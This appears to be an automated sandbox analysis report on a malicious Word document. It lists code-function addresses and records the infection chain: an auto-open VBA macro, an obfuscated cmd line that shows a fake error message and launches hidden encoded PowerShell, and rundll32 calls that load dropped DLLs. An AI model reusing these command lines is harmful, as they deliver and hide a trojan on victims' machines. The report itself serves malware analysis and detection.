Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020A6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00209EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00203D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00207132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00209333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FB10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020D138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F4304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020B706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FEF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FF52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FFF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00202515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F3523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FA323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FEB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F2353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00201372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F4D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00202179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F0D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F2B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00206158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020C15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F5D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020C5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00201BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00207FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FF797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F9D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002041AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FF793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FDB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F3DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FD5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0020819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FD3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F27F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FB3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001FFBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0043303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00441E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00286417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00298C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00290223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00292631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00298A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00294C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00282208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00292C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00281806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00285418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00290672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00284844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00295250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00294A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00291090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00289D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00287B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00287731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00285F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00294F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00289106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00287378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00285B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00299B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00293F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002993AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00292FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002909B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00299DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00297BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002947B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00291F88 9_2_00291F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00290B8A 9_2_00290B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00297187 9_2_00297187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00284D90 9_2_00284D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00293590 9_2_00293590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029C192 9_2_0029C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028BB96 9_2_0028BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002867EF 9_2_002867EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0028F5E0 9_2_0028F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00296BE4 9_2_00296BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029CBE7 9_2_0029CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002835FC 9_2_002835FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00287FFE 9_2_00287FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00291DFE 9_2_00291DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029BBF1 9_2_0029BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0029DBC4 9_2_0029DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00282DDF 9_2_00282DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002857D4 9_2_002857D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002B303C 9_2_002B303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002A87D0 9_2_002A87D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002C1E14 9_2_002C1E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C017 9_2_0034C017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354012 9_2_00354012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C851 9_2_0034C851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349846 9_2_00349846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003590BE 9_2_003590BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003470AD 9_2_003470AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003428AA 9_2_003428AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003450F1 9_2_003450F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003500FE 9_2_003500FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003468EC 9_2_003468EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003430E8 9_2_003430E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E8DD 9_2_0034E8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B8D8 9_2_0034B8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003538C2 9_2_003538C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003508CF 9_2_003508CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357132 9_2_00357132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D138 9_2_0035D138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035891E 9_2_0035891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B10A 9_2_0034B10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00352179 9_2_00352179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035B165 9_2_0035B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00356158 9_2_00356158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C15B 9_2_0035C15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003541AB 9_2_003541AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035819F 9_2_0035819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341983 9_2_00341983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034498C 9_2_0034498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034598B 9_2_0034598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E272 9_2_0034E272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035CA55 9_2_0035CA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003492A3 9_2_003492A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349A99 9_2_00349A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359333 9_2_00359333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A323 9_2_0034A323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344304 9_2_00344304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342B70 9_2_00342B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00351372 9_2_00351372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034EB54 9_2_0034EB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342353 9_2_00342353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00351BA5 9_2_00351BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DB86 9_2_0034DB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D3F5 9_2_0034D3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034FBE6 9_2_0034FBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B3E8 9_2_0034B3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349C3D 9_2_00349C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035CC7F 9_2_0035CC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345478 9_2_00345478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354478 9_2_00354478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035BC4D 9_2_0035BC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003534BF 9_2_003534BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C4A5 9_2_0035C4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346CA5 9_2_00346CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003514FC 9_2_003514FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003534C3 9_2_003534C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00343523 9_2_00343523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F52E 9_2_0034F52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00353D29 9_2_00353D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00352515 9_2_00352515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00340D7A 9_2_00340D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345D63 9_2_00345D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344D48 9_2_00344D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00343DB8 9_2_00343DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D5B8 9_2_0034D5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C5A1 9_2_0035C5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349D95 9_2_00349D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350604 9_2_00350604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359665 9_2_00359665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B6B9 9_2_0034B6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342EAC 9_2_00342EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003566FB 9_2_003566FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035A6D9 9_2_0035A6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359EDA 9_2_00359EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034FF2C 9_2_0034FF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034EF2E 9_2_0034EF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035B706 9_2_0035B706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034177C 9_2_0034177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357FA7 9_2_00357FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F797 9_2_0034F797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F793 9_2_0034F793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003427F3 9_2_003427F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002BA821 10_2_002BA821
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: N00048481397007.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module U765y5vgf_ao0faq, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: N00048481397007.doc OLE indicator, VBA macros: true
Source: powershell.exe, 00000005.00000002.2334898273.000000001D180000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2335074733.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2331258105.0000000001DC0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@44/12@6/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$0048481397007.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD7F7.tmp
Source: N00048481397007.doc OLE indicator, Word Document stream: true
Source: N00048481397007.doc OLE document summary: edited time not present or 0
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
